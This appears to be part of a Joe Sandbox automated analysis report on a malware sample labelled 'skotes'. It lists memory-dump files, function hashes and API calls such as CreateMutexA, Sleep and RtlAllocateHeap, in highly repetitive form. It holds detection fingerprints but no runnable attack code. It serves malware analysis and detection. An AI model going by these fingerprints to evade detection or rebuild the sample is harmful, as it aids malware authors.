Associated: 00000003.00000002.1531831280.0000000000ACA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1531878501.0000000000ADD000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1531878501.0000000000AE8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532331923.0000000000AF1000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532436211.0000000000AF2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532489546.0000000000AFD000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532518977.0000000000B00000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532547585.0000000000B01000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532577868.0000000000B02000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532605363.0000000000B03000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532635329.0000000000B04000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532671862.0000000000B18000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532699440.0000000000B19000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532743572.0000000000B1C000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532788863.0000000000B2E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532826407.0000000000B44000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532857999.0000000000B46000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532890478.0000000000B47000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532922295.0000000000B4D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532959513.0000000000B55000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532989434.0000000000B5A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533018188.0000000000B67000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533046843.0000000000B6A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533068917.0000000000B6B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533099773.0000000000B6E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533132016.0000000000B76000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533161308.0000000000B77000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533199223.0000000000B7F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533222579.0000000000B80000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533249817.0000000000B88000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533278740.0000000000B89000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533278740.0000000000BC9000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533361386.0000000000BDE000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533396199.0000000000BDF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533424171.0000000000BF3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533454868.0000000000BF4000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533489943.0000000000BF5000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533515592.0000000000BFC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533543676.0000000000C0B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533571210.0000000000C0C000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_900000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: 5c3c51667cd476712c6ccbae4cb2087a330cf72c5b3a73bfe0abd784b1ec9ec6
Instruction ID: 81a049d5b5733cf85b443b375c1cdf494a6790843608a2b5bff5ea80b91dab46
Opcode Fuzzy Hash: 5c3c51667cd476712c6ccbae4cb2087a330cf72c5b3a73bfe0abd784b1ec9ec6
Instruction Fuzzy Hash: 9F312831B143449FEB18DB78DC89BADB776DFC5318F248618E028973D1C77599808B92

Function 00909ADC Relevance: 3.1, APIs: 2, Instructions: 107
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 0090A963
CreateMutexA.KERNELBASE(00000000,00000000,00963254), ref: 0090A981

Memory Dump Source

Source File: 00000003.00000002.1530404067.0000000000901000.00000040.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true

Associated: 00000003.00000002.1530077629.0000000000900000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1530404067.0000000000962000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1530727548.0000000000969000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1530766040.000000000096B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1530801626.0000000000977000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1531725930.0000000000AC8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1531831280.0000000000ACA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1531878501.0000000000ADD000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1531878501.0000000000AE8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532331923.0000000000AF1000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532436211.0000000000AF2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532489546.0000000000AFD000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532518977.0000000000B00000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532547585.0000000000B01000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532577868.0000000000B02000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532605363.0000000000B03000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532635329.0000000000B04000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532671862.0000000000B18000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532699440.0000000000B19000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532743572.0000000000B1C000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532788863.0000000000B2E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532826407.0000000000B44000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532857999.0000000000B46000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532890478.0000000000B47000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532922295.0000000000B4D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532959513.0000000000B55000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532989434.0000000000B5A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533018188.0000000000B67000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533046843.0000000000B6A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533068917.0000000000B6B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533099773.0000000000B6E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533132016.0000000000B76000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533161308.0000000000B77000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533199223.0000000000B7F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533222579.0000000000B80000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533249817.0000000000B88000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533278740.0000000000B89000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533278740.0000000000BC9000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533361386.0000000000BDE000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533396199.0000000000BDF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533424171.0000000000BF3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533454868.0000000000BF4000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533489943.0000000000BF5000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533515592.0000000000BFC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533543676.0000000000C0B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533571210.0000000000C0C000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_900000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: a368be10d996fbdc8e08ab4399f7b8efb3992db5bd8d17df8b757ce6d332822d
Instruction ID: 91bff81811290ef0da823ee6a2da471ea976267b8a7c8b58939edc87ba734a4c
Opcode Fuzzy Hash: a368be10d996fbdc8e08ab4399f7b8efb3992db5bd8d17df8b757ce6d332822d
Instruction Fuzzy Hash: F52146317182409FEB189B68ECC9B6DB776EFD1324F208219E428D77D1CB7599808B92

Function 0090A856 Relevance: 3.1, APIs: 2, Instructions: 100
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 0090A963
CreateMutexA.KERNELBASE(00000000,00000000,00963254), ref: 0090A981

Memory Dump Source

Source File: 00000003.00000002.1530404067.0000000000901000.00000040.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true

Associated: 00000003.00000002.1530077629.0000000000900000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1530404067.0000000000962000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1530727548.0000000000969000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1530766040.000000000096B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1530801626.0000000000977000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1531725930.0000000000AC8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1531831280.0000000000ACA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1531878501.0000000000ADD000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1531878501.0000000000AE8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532331923.0000000000AF1000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532436211.0000000000AF2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532489546.0000000000AFD000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532518977.0000000000B00000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532547585.0000000000B01000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532577868.0000000000B02000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532605363.0000000000B03000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532635329.0000000000B04000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532671862.0000000000B18000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532699440.0000000000B19000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532743572.0000000000B1C000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532788863.0000000000B2E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532826407.0000000000B44000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532857999.0000000000B46000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532890478.0000000000B47000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532922295.0000000000B4D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532959513.0000000000B55000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532989434.0000000000B5A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533018188.0000000000B67000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533046843.0000000000B6A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533068917.0000000000B6B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533099773.0000000000B6E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533132016.0000000000B76000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533161308.0000000000B77000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533199223.0000000000B7F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533222579.0000000000B80000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533249817.0000000000B88000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533278740.0000000000B89000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533278740.0000000000BC9000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533361386.0000000000BDE000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533396199.0000000000BDF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533424171.0000000000BF3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533454868.0000000000BF4000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533489943.0000000000BF5000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533515592.0000000000BFC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533543676.0000000000C0B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533571210.0000000000C0C000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_900000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: b5b085f00531b259cc82966d732fa1ad7f4ac2735fc5bf86ff8ef9931113205d
Instruction ID: 17d81faa6a9eebef2208f867d404cd425f9948fbffa27d02abd56ee84103be09
Opcode Fuzzy Hash: b5b085f00531b259cc82966d732fa1ad7f4ac2735fc5bf86ff8ef9931113205d
Instruction Fuzzy Hash: 76213D31758301DEF724A7A88C9A76DB265DFC1314F248816E908963D1CB79598192E3

Function 0090A34F Relevance: 3.1, APIs: 2, Instructions: 100
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 0090A963
CreateMutexA.KERNELBASE(00000000,00000000,00963254), ref: 0090A981

Memory Dump Source

Source File: 00000003.00000002.1530404067.0000000000901000.00000040.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true

Associated: 00000003.00000002.1530077629.0000000000900000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1530404067.0000000000962000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1530727548.0000000000969000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1530766040.000000000096B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1530801626.0000000000977000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1531725930.0000000000AC8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1531831280.0000000000ACA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1531878501.0000000000ADD000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1531878501.0000000000AE8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532331923.0000000000AF1000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532436211.0000000000AF2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532489546.0000000000AFD000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532518977.0000000000B00000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532547585.0000000000B01000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532577868.0000000000B02000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532605363.0000000000B03000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532635329.0000000000B04000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532671862.0000000000B18000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532699440.0000000000B19000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532743572.0000000000B1C000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532788863.0000000000B2E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532826407.0000000000B44000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532857999.0000000000B46000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532890478.0000000000B47000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532922295.0000000000B4D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532959513.0000000000B55000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532989434.0000000000B5A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533018188.0000000000B67000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533046843.0000000000B6A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533068917.0000000000B6B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533099773.0000000000B6E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533132016.0000000000B76000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533161308.0000000000B77000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533199223.0000000000B7F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533222579.0000000000B80000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533249817.0000000000B88000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533278740.0000000000B89000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533278740.0000000000BC9000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533361386.0000000000BDE000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533396199.0000000000BDF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533424171.0000000000BF3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533454868.0000000000BF4000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533489943.0000000000BF5000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533515592.0000000000BFC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533543676.0000000000C0B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533571210.0000000000C0C000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_900000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: ea62536bea8f374b4c8a333807dac880aa5c752b2647602ba33fd0be20ac2c67
Instruction ID: 5ada0a41f0e554c38df4b20c546b0d2d5034cf979852139f38f4185e049ead36
Opcode Fuzzy Hash: ea62536bea8f374b4c8a333807dac880aa5c752b2647602ba33fd0be20ac2c67
Instruction Fuzzy Hash: 722168327143049FEB18DB68DC8976DB776DFD2319F248219E428D77D0CB769A808792

Function 0093D82F Relevance: 1.5, APIs: 1, Instructions: 40
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(00000008,?,00000000,?,0093A813,00000001,00000364,00000006,000000FF,?,0093EE3F,?,00000004,00000000,?,?), ref: 0093D871

Memory Dump Source

Source File: 00000003.00000002.1530404067.0000000000901000.00000040.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true

Associated: 00000003.00000002.1530077629.0000000000900000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1530404067.0000000000962000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1530727548.0000000000969000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1530766040.000000000096B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1530801626.0000000000977000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1531725930.0000000000AC8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1531831280.0000000000ACA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1531878501.0000000000ADD000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1531878501.0000000000AE8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532331923.0000000000AF1000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532436211.0000000000AF2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532489546.0000000000AFD000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532518977.0000000000B00000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532547585.0000000000B01000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532577868.0000000000B02000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532605363.0000000000B03000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532635329.0000000000B04000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532671862.0000000000B18000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532699440.0000000000B19000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532743572.0000000000B1C000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532788863.0000000000B2E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532826407.0000000000B44000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532857999.0000000000B46000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532890478.0000000000B47000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532922295.0000000000B4D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532959513.0000000000B55000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532989434.0000000000B5A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533018188.0000000000B67000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533046843.0000000000B6A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533068917.0000000000B6B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533099773.0000000000B6E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533132016.0000000000B76000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533161308.0000000000B77000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533199223.0000000000B7F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533222579.0000000000B80000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533249817.0000000000B88000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533278740.0000000000B89000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533278740.0000000000BC9000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533361386.0000000000BDE000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533396199.0000000000BDF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533424171.0000000000BF3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533454868.0000000000BF4000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533489943.0000000000BF5000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533515592.0000000000BFC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533543676.0000000000C0B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533571210.0000000000C0C000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_900000_skotes.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 373c28608a71fef0f36dfc6c949720e46e17a604b9b8b8080c0c35d3058c1bba
Instruction ID: ac88d00c7fd1434abbdc42a857d47dcf7a844d058dfc90003d98b8c894c1275f
Opcode Fuzzy Hash: 373c28608a71fef0f36dfc6c949720e46e17a604b9b8b8080c0c35d3058c1bba
Instruction Fuzzy Hash: 38F0823260722566EB316A76BC21B5B7B5DDF85770F188521FD18A7181DA60FC008EE0

Non-executed Functions

Function 00902EC0 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 272threadCOMMON

Download Yara Rule

APIs

__Mtx_unlock.LIBCPMT ref: 00902F5F
GetCurrentThreadId.KERNEL32 ref: 00902F7E
__Mtx_unlock.LIBCPMT ref: 00902FCC
__Cnd_broadcast.LIBCPMT ref: 00902FE3
__Mtx_unlock.LIBCPMT ref: 009030F5
GetCurrentThreadId.KERNEL32 ref: 00903132
__Mtx_unlock.LIBCPMT ref: 0090319B

Strings

+ax4, xrefs: 00902ED7, 00903054, 00903203

Memory Dump Source

Source File: 00000003.00000002.1530404067.0000000000901000.00000040.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true

Associated: 00000003.00000002.1530077629.0000000000900000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1530404067.0000000000962000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1530727548.0000000000969000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1530766040.000000000096B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1530801626.0000000000977000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1531725930.0000000000AC8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1531831280.0000000000ACA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1531878501.0000000000ADD000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1531878501.0000000000AE8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532331923.0000000000AF1000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532436211.0000000000AF2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532489546.0000000000AFD000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532518977.0000000000B00000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532547585.0000000000B01000.00000080.00000001.01000000.00000008.sdmpDownload File
